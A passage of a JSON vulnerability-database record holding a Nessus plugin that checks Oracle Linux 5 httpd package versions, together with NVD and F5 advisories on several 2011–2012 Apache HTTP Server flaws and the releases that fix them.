reference:\"httpd-manual-2.2.3-63.0.1.el5_8.1\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"mod_ssl-2.2.3-63.0.1.el5_8.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd / httpd-devel / httpd-manual / mod_ssl\");\n}\n", "title": "Oracle Linux 5 : httpd (ELSA-2012-0323)", "type": "nessus", "viewCount": 1}, "differentElements": ["modified", "sourceData"], "edition": 2, "lastseen": "2017-10-29T13:32:56"}], "edition": 6, "hashmap": [{"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "cpe", "hash": "8f7ef314d920891c344985cdc4f824f1"}, {"key": "cvelist", "hash": "16ae3c93dc83302d463471eefbc44076"}, {"key": "cvss", "hash": "292f2e293571b0e70e3182b615982dad"}, {"key": "description", "hash": "fd50af444fa6f1e3cc440c5416dbd7c3"}, {"key": "href", "hash": "3c09fd39dca9bce8dafe505ecf682fca"}, {"key": "modified", "hash": "2e3c438f66403fd816adabf5a1b82b29"}, {"key": "naslFamily", "hash": "e31ed89ab0cbb68ce2c40f17ec1e5483"}, {"key": "pluginID", "hash": "7d77095f188ad2b45d2c83a576a305e2"}, {"key": "published", "hash": "0db193a0effe2d65dffecdb5e4d9c241"}, {"key": "references", "hash": "21d1eb58c85fb6f05d58534760094021"}, {"key": "reporter", "hash": "9cf00d658b687f030ebe173a0528c567"}, {"key": "sourceData", "hash": "a32f25318843d8ff315ab9875d6d2ee1"}, {"key": "title", "hash": "ba5421b34c575442e1dfc9eefc2b01f3"}, {"key": "type", "hash": "5e0bd03bec244039678f2b955a2595aa"}], "hash": "20195c94692bd896f681dabb7f4098129fd0de1599ab2f261dda9bdeb0e3b250", "viewCount": 1, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2011-3607", "CVE-2012-0031", "CVE-2012-0053", "CVE-2011-3639"]}, {"type": "f5", "idList": ["F5:K15889", "F5:K16907", "SOL16907", "SOL15889", "F5:K20979231", "SOL15273", "SOL20979231"]}, {"type": "oraclelinux", "idList": ["ELSA-2012-0323", "ELSA-2012-0128", "ELSA-2013-0512"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310120253", "OPENVAS:1361412562310123992", "OPENVAS:1361412562310123980", "OPENVAS:1361412562310870571", "OPENVAS:870571", "OPENVAS:1361412562310881089", "OPENVAS:136141256231070724", "OPENVAS:870631", "OPENVAS:881089", "OPENVAS:70724"]}, {"type": "nessus", "idList": ["CENTOS_RHSA-2012-0128.NASL", "REDHAT-RHSA-2012-0128.NASL", "ORACLELINUX_ELSA-2012-0128.NASL", "SL_20120221_HTTPD_ON_SL5_X.NASL", "SL_20120213_HTTPD_ON_SL6_X.NASL", "ALA_ALAS-2012-46.NASL", "REDHAT-RHSA-2012-0323.NASL", "DEBIAN_DSA-2405.NASL", "UBUNTU_USN-1368-1.NASL", "OPENSUSE-2012-132.NASL"]}, {"type": "redhat", "idList": ["RHSA-2012:0323", "RHSA-2012:0128", "RHSA-2012:0542"]}, {"type": "seebug", "idList": ["SSV:30056", "SSV:23169", "SSV:30024"]}, {"type": "debian", "idList": ["DEBIAN:DSA-2405-1:AE657"]}, {"type": "centos", "idList": ["CESA-2012:0128"]}, {"type": "amazon", "idList": ["ALAS-2012-046"]}, {"type": "ubuntu", "idList": ["USN-1368-1"]}, {"type": "slackware", "idList": ["SSA-2012-041-01"]}, {"type": "freebsd", "idList": ["4B7DBFAB-4C6B-11E1-BC16-0023AE8E59F0"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:12166", "SECURITYVULNS:DOC:27611", "SECURITYVULNS:VULN:12139"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2012:0314-1", "SUSE-SU-2012:0284-1", "SUSE-SU-2012:0323-1"]}, {"type": "kaspersky", "idList": ["KLA10065"]}, {"type": "httpd", "idList": ["HTTPD:560EB66BD0C9D4921E114954F57484F0", "HTTPD:CD3865BDB48B91719A525A87DFA73750", "HTTPD:98531A1B4917D4CDD88FDEF74307A1F3", "HTTPD:19058D084C7C00E6FB6A3AD068C9416B", "HTTPD:8BA47632F35C9AB31E24EEFA64CB532A", "HTTPD:2D6863E2D9663FEAEBBED0A62CE75D64"]}, {"type": "exploitdb", "idList": ["EDB-ID:41768"]}, {"type": "zdt", "idList": ["1337DAY-ID-27465"]}, {"type": "gentoo", "idList": ["GLSA-201206-25"]}], "modified": "2019-01-16T20:16:46"}, "vulnersScore": 7.5}, "objectVersion": "1.3", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2012:0323 and \n# Oracle Linux Security Advisory ELSA-2012-0323 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(68488);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2018/07/18 17:43:56\");\n\n script_cve_id(\"CVE-2011-3607\", \"CVE-2011-3639\", \"CVE-2012-0031\", \"CVE-2012-0053\");\n script_bugtraq_id(50322, 50494, 51407, 51706, 51869);\n script_xref(name:\"RHSA\", value:\"2012:0323\");\n\n script_name(english:\"Oracle Linux 5 : httpd (ELSA-2012-0323)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2012:0323 :\n\nUpdated httpd packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe Apache HTTP Server is a popular web server.\n\nIt was discovered that the fix for CVE-2011-3368 (released via\nRHSA-2011:1392) did not completely address the problem. An attacker\ncould bypass the fix and make a reverse proxy connect to an arbitrary\nserver not directly accessible to the attacker by sending an HTTP\nversion 0.9 request. (CVE-2011-3639)\n\nThe httpd server included the full HTTP header line in the default\nerror page generated when receiving an excessively long or malformed\nheader. Malicious JavaScript running in the server's domain context\ncould use this flaw to gain access to httpOnly cookies.\n(CVE-2012-0053)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way httpd performed substitutions in regular expressions.\nAn attacker able to set certain httpd settings, such as a user\npermitted to override the httpd configuration for a specific directory\nusing a '.htaccess' file, could use this flaw to crash the httpd child\nprocess or, possibly, execute arbitrary code with the privileges of\nthe 'apache' user. (CVE-2011-3607)\n\nA flaw was found in the way httpd handled child process status\ninformation. A malicious program running with httpd child process\nprivileges (such as a PHP or CGI script) could use this flaw to cause\nthe parent httpd process to crash during httpd service shutdown.\n(CVE-2012-0031)\n\nAll httpd users should upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing\nthe updated packages, the httpd daemon will be restarted\nautomatically.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2012-March/002683.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected httpd packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-14-410\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:5\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/03/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 5\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL5\", reference:\"httpd-2.2.3-63.0.1.el5_8.1\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"httpd-devel-2.2.3-63.0.1.el5_8.1\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"httpd-manual-2.2.3-63.0.1.el5_8.1\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"mod_ssl-2.2.3-63.0.1.el5_8.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd / httpd-devel / httpd-manual / mod_ssl\");\n}\n", "naslFamily": "Oracle Linux Local Security Checks", "pluginID": "68488", "cpe": ["p-cpe:/a:oracle:linux:httpd-devel", "p-cpe:/a:oracle:linux:httpd", "cpe:/o:oracle:linux:5", "p-cpe:/a:oracle:linux:mod_ssl", "p-cpe:/a:oracle:linux:httpd-manual"]}
{"cve": [{"lastseen": "2018-01-09T15:22:17", "bulletinFamily": "NVD", "description": "Integer overflow in the ap_pregsub function in server/util.c in the Apache HTTP Server 2.0.x through 2.0.64 and 2.2.x through 2.2.21, when the mod_setenvif module is enabled, allows local users to gain privileges via a .htaccess file with a crafted SetEnvIf directive, in conjunction with a crafted HTTP request header, leading to a heap-based buffer overflow.", "modified": "2018-01-08T21:29:01", "published": "2011-11-08T06:55:05", "id": "CVE-2011-3607", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-3607", "title": "CVE-2011-3607", "type": "cve", "cvss": {"score": 4.4, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-01-18T11:55:02", "bulletinFamily": "NVD", "description": "scoreboard.c in the Apache HTTP Server 2.2.21 and earlier might allow local users to cause a denial of service (daemon crash during shutdown) or possibly have unspecified other impact by modifying a certain type field within a scoreboard shared memory segment, leading to an invalid call to the free function.", "modified": "2018-01-17T21:29:01", "published": "2012-01-18T15:55:02", "id": "CVE-2012-0031", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-0031", "title": "CVE-2012-0031", "type": "cve", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-12-29T12:17:20", "bulletinFamily": "NVD", "description": "The mod_proxy module in the Apache HTTP Server 2.0.x through 2.0.64 and 2.2.x before 2.2.18, when the Revision 1179239 patch is in place, does not properly interact with use of (1) RewriteRule and (2) ProxyPassMatch pattern matches for configuration of a reverse proxy, which allows remote attackers to send requests to intranet servers by using the HTTP/0.9 protocol with a malformed URI containing an initial @ (at sign) character. NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-3368.", "modified": "2017-12-28T21:29:04", "published": "2011-11-29T23:05:58", "id": "CVE-2011-3639", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-3639", "title": "CVE-2011-3639", "type": "cve", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-01-18T11:55:02", "bulletinFamily": "NVD", "description": "protocol.c in the Apache HTTP Server 2.2.x through 2.2.21 does not properly restrict header information during construction of Bad Request (aka 400) error documents, which allows remote attackers to obtain the values of HTTPOnly cookies via vectors involving a (1) long or (2) malformed header in conjunction with crafted web script.", "modified": "2018-01-17T21:29:02", "published": "2012-01-27T23:05:00", "id": "CVE-2012-0053", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-0053", "title": "CVE-2012-0053", "type": "cve", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "f5": [{"lastseen": "2017-12-19T06:45:37", "bulletinFamily": "software", "description": "\nF5 Product Development has assigned ID 377332 (BIG-IP), ID 474664 (Enterprise Manager), and ID 431234 (ARX) to this vulnerability, and has evaluated the currently supported releases for potential vulnerability. Additionally, [BIG-IP iHealth](<http://www.f5.com/support/support-tools/big-ip-ihealth>) may list Heuristic H492118 on the **Diagnostics** >** Identified** > **Medium** screen. \n\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct | Versions known to be vulnerable | Versions known to be not vulnerable | Vulnerable component or feature \n---|---|---|--- \nBIG-IP LTM | 11.0.0 - 11.1.0 \n10.0.0 - 10.2.4 | 11.2.0 - 11.6.0 \n10.2.4 HF12 | httpd (Configuration utility, iControl) \nBIG-IP AAM | None | 11.4.0 - 11.6.0 | None \nBIG-IP AFM | None | 11.3.0 - 11.6.0 | None \nBIG-IP Analytics | 11.0.0 - 11.1.0 | 11.2.0 - 11.6.0 | httpd (Configuration utility, iControl) \nBIG-IP APM | 11.0.0 - 11.1.0 \n10.1.0 - 10.2.4 | 11.2.0 - 11.6.0 \n10.2.4 HF12 | httpd (Configuration utility, iControl) \nBIG-IP ASM | 11.0.0 - 11.1.0 \n10.0.0 - 10.2.4 | 11.2.0 - 11.6.0 \n10.2.4 HF12 | httpd (Configuration utility, iControl) \nBIG-IP Edge Gateway | 11.0.0 - 11.1.0 \n10.1.0 - 10.2.4 | 11.2.0 - 11.3.0 \n10.2.4 HF12 | httpd (Configuration utility, iControl) \nBIG-IP GTM | 11.0.0 - 11.1.0 \n10.0.0 - 10.2.4 \n| 11.2.0 - 11.6.0 \n10.2.4 HF12 \n| httpd (Configuration utility, iControl) \nBIG-IP Link Controller | 11.0.0 - 11.1.0 \n10.0.0 - 10.2.4 | 11.2.0 - 11.6.0 \n10.2.4 HF12 | httpd (Configuration utility, iControl) \nBIG-IP PEM | None | 11.3.0 - 11.6.0 | None \nBIG-IP PSM | 11.0.0 - 11.1.0 \n10.0.0 - 10.2.4 | 11.2.0 - 11.4.1 \n10.2.4 HF12 | httpd (Configuration utility, iControl) \nBIG-IP WebAccelerator | 11.0.0 - 11.1.0 \n10.0.0 - 10.2.4 | 11.2.0 - 11.3.0 \n10.2.4 HF12 | httpd (Configuration utility, iControl) \nBIG-IP WOM | 11.0.0 - 11.1.0 \n10.0.0 - 10.2.4 | 11.2.0 - 11.3.0 \n10.2.4 HF12 | httpd (Configuration utility, iControl) \nARX | 6.2.0 - 6.4.0* | None | Management API (disabled by default) \nEnterprise Manager | 2.1.0 - 2.3.0 | 3.0.0 - 3.1.1 | httpd (Configuration utility, iControl) \nFirePass | None | 7.0.0 \n6.1.0 | None \nBIG-IQ Cloud | None | 4.0.0 - 4.5.0 | None \nBIG-IQ Device | None | 4.2.0 - 4.5.0 | None \nBIG-IQ Security | None | 4.0.0 - 4.5.0 | None \nBIG-IQ ADC | None | 4.5.0 | None \n \n* ARX is not vulnerable to CVE-2012-0021. \n\n\nIf the previous table lists a version in the **Versions known to be not vulnerable** column, you can eliminate this vulnerability by upgrading to the listed version. If the listed version is older than the version you are currently running, or if the table does not list any version in the column, then no upgrade candidate currently exists. \n \nF5 is responding to this vulnerability as determined by the parameters defined in [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>). \n\n\nTo mitigate this vulnerability for ARX, do not enable the API functionality.\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n", "modified": "2016-01-09T02:05:00", "published": "2014-12-04T09:32:00", "href": "https://support.f5.com/csp/article/K15889", "id": "F5:K15889", "title": "Apache HTTP server vulnerabilities CVE-2011-3368, CVE-2011-4317, CVE-2012-0021, CVE-2012-0031, and CVE-2012-0053", "type": "f5", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-10-12T02:11:05", "bulletinFamily": "software", "description": "Integer overflow in the ap_pregsub function in server/util.c in the Apache HTTP Server 2.0.x through 2.0.64 and 2.2.x through 2.2.21, when the mod_setenvif module is enabled, allows local users to gain privileges via a .htaccess file with a crafted SetEnvIf directive, in conjunction with a crafted HTTP request header, leading to a heap-based buffer overflow. ([CVE-2011-3607](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3607>))\n\nImpact\n\nA local attacker may be able to gain privileges by way of an **a .htaccess** file with a crafted SetEnvIf directive, in conjunction with a crafted HTTP request header, leading to a heap-based buffer overflow.\n\nIf the previous table lists a version in the **Versions known to be not vulnerable** column, you can eliminate this vulnerability by upgrading to the listed version. If the listed version is older than the version you are currently running, or if the table does not list any version in the column, then no upgrade candidate currently exists.\n\nF5 responds to vulnerabilities in accordance with the **Severity** values published in the previous table. The **Severity** values and other security vulnerability parameters are defined in [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>).\n\nTo mitigate this vulnerability, you should permit management access to F5 products only over a secure network and restrict command line access for affected systems to the trusted users. For more information, refer to [K13309: Restricting access to the Configuration utility by source IP address (11.x)](<https://support.f5.com/csp/article/K13309>) and [K13092: Overview of securing access to the BIG-IP system](<https://support.f5.com/csp/article/K13092>).\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n", "modified": "2016-01-09T02:22:00", "published": "2015-07-23T22:22:00", "href": "https://support.f5.com/csp/article/K16907", "id": "F5:K16907", "title": "Apache HTTPD vulnerability CVE-2011-3607", "type": "f5", "cvss": {"score": 4.4, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-26T17:23:07", "bulletinFamily": "software", "description": "Integer overflow in the ap_pregsub function in server/util.c in the Apache HTTP Server 2.0.x through 2.0.64 and 2.2.x through 2.2.21, when the mod_setenvif module is enabled, allows local users to gain privileges via a .htaccess file with a crafted SetEnvIf directive, in conjunction with a crafted HTTP request header, leading to a heap-based buffer overflow. ([CVE-2011-3607](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3607>))\n", "modified": "2015-12-22T00:00:00", "published": "2015-07-23T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/16000/900/sol16907.html", "id": "SOL16907", "title": "SOL16907 - Apache HTTPD vulnerability CVE-2011-3607", "type": "f5", "cvss": {"score": 4.4, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-26T17:23:18", "bulletinFamily": "software", "description": " * [CVE-2011-3368](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3368>) \n \nThe mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42, 2.0.x through 2.0.64, and 2.2.x through 2.2.21 does not properly interact with use of (1) RewriteRule and (2) ProxyPassMatch pattern matches for configuration of a reverse proxy, which allows remote attackers to send requests to intranet servers via a malformed URI containing an initial @ (at sign) character.\n * [CVE-2011-4317](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4317>) \n \nThe mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42, 2.0.x through 2.0.64, and 2.2.x through 2.2.21, when the Revision 1179239 patch is in place, does not properly interact with use of (1) RewriteRule and (2) ProxyPassMatch pattern matches for configuration of a reverse proxy, which allows remote attackers to send requests to intranet servers via a malformed URI containing an @ (at sign) character and a : (colon) character in invalid positions. NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-3368.\n * [CVE-2012-0021](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0021>) \n \nThe log_cookie function in mod_log_config.c in the mod_log_config module in the Apache HTTP Server 2.2.17 through 2.2.21, when a threaded MPM is used, does not properly handle a %{}C format string, which allows remote attackers to cause a denial of service (daemon crash) via a cookie that lacks both a name and a value.\n * [CVE-2012-0031](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0031>) \n \nscoreboard.c in the Apache HTTP Server 2.2.21 and earlier might allow local users to cause a denial of service (daemon crash during shutdown) or possibly have unspecified other impact by modifying a certain type field within a scoreboard shared memory segment, leading to an invalid call to the free function.\n * [CVE-2012-0053](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0053>) \n \nprotocol.c in the Apache HTTP Server 2.2.x through 2.2.21 does not properly restrict header information during construction of Bad Request (aka 400) error documents, which allows remote attackers to obtain the values of HTTPOnly cookies via vectors involving a (1) long or (2) malformed header in conjunction with crafted web script.\n", "modified": "2015-08-03T00:00:00", "published": "2014-12-03T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/15000/800/sol15889.html", "id": "SOL15889", "title": "SOL15889 - Apache HTTP server vulnerabilities CVE-2011-3368, CVE-2011-4317, CVE-2012-0021, CVE-2012-0031, and CVE-2012-0053", "type": "f5", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2016-09-26T17:22:50", "bulletinFamily": "software", "description": "Recommended Action\n\nIf the previous table lists a version in the **Versions known to be not vulnerable** column, you can eliminate this vulnerability by upgrading to the listed version. If the table does not list any version in the column, then no upgrade candidate currently exists.\n\n**ARX**\n\nTo mitigate this vulnerability, do not enable the API functionality. \n\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL167: Downloading software and firmware from F5\n * SOL9502: BIG-IP hotfix matrix\n * SOL10322: FirePass hotfix matrix\n * SOL12766: ARX hotfix matrix\n * SOL3430: Installing FirePass hotfixes\n", "modified": "2015-08-07T00:00:00", "published": "2014-05-19T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/15000/200/sol15273.html", "id": "SOL15273", "title": "SOL15273 - Apache vulnerability CVE-2012-0053", "type": "f5", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-06-08T00:16:04", "bulletinFamily": "software", "description": "\nF5 Product Development has assigned ID 431234 (ARX) to this vulnerability, and has evaluated the currently supported releases for potential vulnerability.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| None| 12.0.0 \n11.0.0 - 11.6.0 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP AAM| None| 12.0.0 \n11.4.0 - 11.6.0| Not vulnerable| None \nBIG-IP AFM| None| 12.0.0 \n11.3.0 - 11.6.0| Not vulnerable| None \nBIG-IP Analytics| None| 12.0.0 \n11.0.0 - 11.6.0| Not vulnerable| None \nBIG-IP APM| None| 12.0.0 \n11.0.0 - 11.6.0 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP ASM| None| 12.0.0 \n11.0.0 - 11.6.0 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP DNS| None| 12.0.0| Not vulnerable| None \nBIG-IP Edge Gateway| None| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP GTM| None| 11.0.0 - 11.6.0 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP Link Controller| None| 12.0.0 \n11.0.0 - 11.6.0 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP PEM| None| 12.0.0 \n11.3.0 - 11.6.0| Not vulnerable| None \nBIG-IP PSM| None| 11.0.0 - 11.4.1 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP WebAccelerator| None| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP WOM| None| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4| Not vulnerable| None \nARX| 6.0.0 - 6.4.0| None| Low| Management API (disabled by default) \nEnterprise Manager| None| 3.0.0 - 3.1.1| Not vulnerable| None \nFirePass| None| 7.0.0 \n6.0.0 - 6.1.0| Not vulnerable| None \nBIG-IQ Cloud| None| 4.0.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Device| None| 4.2.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Security| None| 4.0.0 - 4.5.0| Not vulnerable| None \nBIG-IQ ADC| None| 4.5.0| Not vulnerable| None \nBIG-IQ Centralized Management| None| 4.6.0| Not vulnerable| None \nBIG-IQ Cloud and Orchestration| None| 1.0.0| Not vulnerable| None \nLineRate| None| 2.5.0 - 2.6.1| Not vulnerable| None \nF5 WebSafe| None| 1.0.0| Not vulnerable| None \nTraffix SDC| None| 4.0.0 - 4.4.0 \n3.3.2 - 3.5.1 \n| Not vulnerable| None\n\nIf you are running a version listed in the **Versions known to be vulnerable **column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nF5 responds to vulnerabilities in accordance with the **Severity **values published in the previous table. The **Severity **values and other security vulnerability parameters are defined in [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>).\n\nTo mitigate this vulnerability for the ARX system, do not enable the API functionality.\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n * [K13123: Managing BIG-IP product hotfixes (11.x - 12.x)](<https://support.f5.com/csp/article/K13123>)\n * [K10025: Managing BIG-IP product hotfixes (10.x)](<https://support.f5.com/csp/article/K10025>)\n * [K9502: BIG-IP hotfix matrix](<https://support.f5.com/csp/article/K9502>)\n * [K10322: FirePass hotfix matrix](<https://support.f5.com/csp/article/K10322>)\n * [K12766: ARX hotfix matrix](<https://support.f5.com/csp/article/K12766>)\n * [K3430: Installing FirePass hotfixes](<https://support.f5.com/csp/article/K3430>)\n * [K6664: Obtaining and installing OPSWAT hotfixes](<https://support.f5.com/csp/article/K6664>)\n * [K10942: Installing OPSWAT hotfixes on BIG-IP APM systems](<https://support.f5.com/csp/article/K10942>)\n", "modified": "2016-01-09T02:32:00", "published": "2015-12-30T01:32:00", "id": "F5:K20979231", "href": 